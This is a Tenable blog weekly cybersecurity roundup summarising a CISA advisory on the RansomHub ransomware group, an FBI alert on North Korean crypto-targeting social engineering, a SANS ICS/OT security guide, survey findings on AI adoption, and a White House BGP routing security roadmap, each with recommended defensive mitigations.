Dive into six things that are top of mind for the week ending September 6.

1 - CISA: Keep RansomHub RaaS gang on your radar screen

RansomHub, a relatively new ransomware group, has become a serious threat as its successful ransomware-as-a-service (RaaS) model increasingly lures prominent affiliates away from competitors like LockBit.

That’s the warning from CISA, which urges cyber teams to protect their organizations by keeping software updated, adopting phishing-resistant multi-factor authentication and training employees to recognize phishing attacks.

In an advisory titled “#StopRansomware: RansomHub Ransomware,” CISA details the RaaS gang’s tactics, techniques and procedures, as well as its indicators of compromise, and offers mitigation recommendations.

 

 

RansomHub and its affiliates have successfully attacked at least 210 organizations from a wide variety of industries, including from multiple critical infrastructure sectors.

Highlights from the advisory include:

Recommended mitigation measures include:

  • Adopt a recovery plan for storing critical data in locations that are physically separate, segmented and secure. Back up data offline and encrypt it.
  • Enforce strong-password requirements.
  • Maintain all operating systems, software and firmware updated.
  • Protect administrator accounts with phishing-resistant MFA, least-privilege principles and time-based access, like the just-in-time access method.
  • Segment networks and monitor them for unusual and suspicious activity.
  • Check for unrecognized accounts in domain controllers, servers, workstations and directories.

Previously known as Cyclops and Knight, RansomHub was launched in February of this year and ranked as the most active ransomware group in July with 11% of all attacks, according to NCC Group.

The FBI, the Multi-State Information Sharing and Analysis Center (MS-ISAC) and the Department of Health and Human Services (HHS) partnered with CISA on this advisory.

For more information about ransomware trends and security best practices:

2 - FBI: North Korean hackers go after crypto players

Using intricate, persistent and stealthy social-engineering schemes, North Korea’s government is targeting staffers at crypto organizations to steal cryptocurrency by breaching their networks using malware.

Specifically, hackers acting on behalf of North Korea’s government have their sights set on organizations that offer cryptocurrency exchange-traded funds (ETFs) and other crypto-based financial products.

That’s according to the FBI, which this week issued an alert for companies in the cryptocurrency sector titled “North Korea Aggressively Targeting Crypto Industry with Well-Disguised Social Engineering Attacks.

“North Korea employs sophisticated tactics to steal cryptocurrency funds and is a persistent threat to organizations with access to large quantities of cryptocurrency-related assets or products,” reads the FBI alert.

 

 

Tactics employed by these North Korean hackers include:

  • Conducting thorough and detailed research on employees of the crypto organizations they intend to target
  • Creating elaborate fake offers such as employment and investment opportunities that are tailored for each targeted individual
  • Interacting extensively one-on-one with the victims, often impersonating real people, such as recruiters
  • Requesting to:
    • Execute code or download apps on company-owned devices
    • Conduct “pre-employment” technical tests or exercises involving the execution of packages and scripts
    • Run a script in order to enable voice calls or video meetings 

Among the FBI’s recommended mitigations are:

  • Develop methods to verify a contact’s identity.
  • Don’t keep crypto-wallet information, such as logins and passwords, in devices connected to the internet.
  • Decline to take pre-employment tests or to execute code on company-owned devices.
  • Conduct multiple authentication checks and require approvals from unconnected networks before carrying out financial transactions.

For more information about crypto hacking trends:

3 - Tenable surveys webinar attendees on cloud-native VM

During our recent webinar “A Cyber Pro's Guide to Cloud-Native Vulnerability Management,” we polled attendees about issues related to cloud VM and cloud-native technologies. See what they said about their cloud-native application challenges and cloud VM strategies!

(62 webinar attendees polled by Tenable, August 2024)

(49 webinar attendees polled by Tenable, August 2024)

Want to learn more about the benefits of agentless cloud security and about extending your VM strategy to the cloud? Watch the on-demand webinar “A Cyber Pro's Guide to Cloud-Native Vulnerability Management” today.

4 - SANS: Businesses can’t ignore security of ICS and OT

Looking for insights and best practices to boost the cybersecurity of your industrial control systems (ICS) and operational technology systems (OT)? You might want to check out SANS Institute’s new guide "ICS Is the Business: Why Securing ICS/OT Environments Is Business-Critical in 2024."

The guide stresses that protecting ICS and OT systems is essential for business success and that to secure ICS and OT systems you can’t use the same strategy, processes and tools you employ to protect the IT environment.

“The steps outlined here are essential for ensuring that our industrial systems continue to operate safely and reliably,” author Dean Parsons, a SANS Certified Instructor, said in a statement.

 

 

Topics covered in the paper include:

  • An overview of the top threats impacting ICS and OT systems, including targeted, tailored strikes against these environments; ransomware attacks; supply chain breaches; and attacks that originate in the IT network.
  • The differences between IT and ICS/OT environments, and why they require a different security approach.
  • Five critical cybersecurity controls for ICS/OT:
    • ICS-specific incident response
    • Network architecture that supports defensible controls, like segmentation and log collection
    • ICS network visibility and monitoring
    • ICS secure remote access
    • Risk-based ICS vulnerability management
  • How to use AI to bolster ICS/OT security.
  • The ways in which CISOs can advance their organizations’ ICS/OT security maturity.

For more information about OT security, check out these Tenable resources:

5 - Cybersecurity among top techs getting an AI boost

Cybersecurity ranks high among the technologies into which organizations are integrating AI in order to beef up their tech stacks’ capabilities and improve IT productivity.

That’s according to CompTIA’s “Building AI Strategy” report, based on a survey of 511 tech and business pros in North America.

When respondents were asked which of their tech initiatives are incorporating AI, cybersecurity came in third, mentioned by 61%, behind automation (67%) and data analysis (63%). 

“In these (three) cases, AI can understand a wide variety of inputs related to the problem at hand, then provide various forms of assistance, such as direct automation of certain tasks, suggestions of patterns found in data, or predictions of cyber attacks,” the report reads.

 

 

Cybersecurity also made the list of respondents’ main concerns related to their use of AI in technology, ranking third. The top concern was finding the right interaction balance between AI tools and employees, followed by infrastructure costs for AI.

For more information about the intersection of AI and cybersecurity, check out these Tenable blogs:

6 - U.S. government wants to boost security of internet routing

The technology that underpins the internet’s traffic routing is insecure – a dangerous weak link that cyberattackers are increasingly targeting and that represents a global cyber risk.

So said the White House, which is urging a variety of players, including government agencies, internet service providers, academia, mobile operators and cloud providers, to help address the problem.

The report “Roadmap To Enhancing Internet Routing Security” by the Office of the National Cyber Director was released this week and aims to foster the adoption of technologies that can make the ubiquitous Border Gateway Protocol (BGP) more secure.

“As initially designed and commonly operating today, BGP does not provide adequate security and resilience features for the risks we currently face,” the report reads.

 


For example, BGP is unable to determine if messages exchanged between neighboring networks are authentic, nor can it verify that information from remote networks is legit. Over the past two decades, BGP’s design vulnerabilities have led to serious misconfiguration accidents, and opened the door for a variety of cyberattacks.

The good news is that initial techniques to boost BGP’s security and resilience have been introduced and standardized, and are being deployed, specifically security mechanisms based on Resource Public Key Infrastructure (RPKI), according to the document.

“This roadmap provides recommendations and guidance necessary to increase the adoption of these initial BGP security technologies across all network operators in the Internet ecosystem,” the report reads.

Juan Perez
Checked
3 hours 13 minutes ago
URL
https://www.tenable.com/
Tenable Blog feed

Managed ad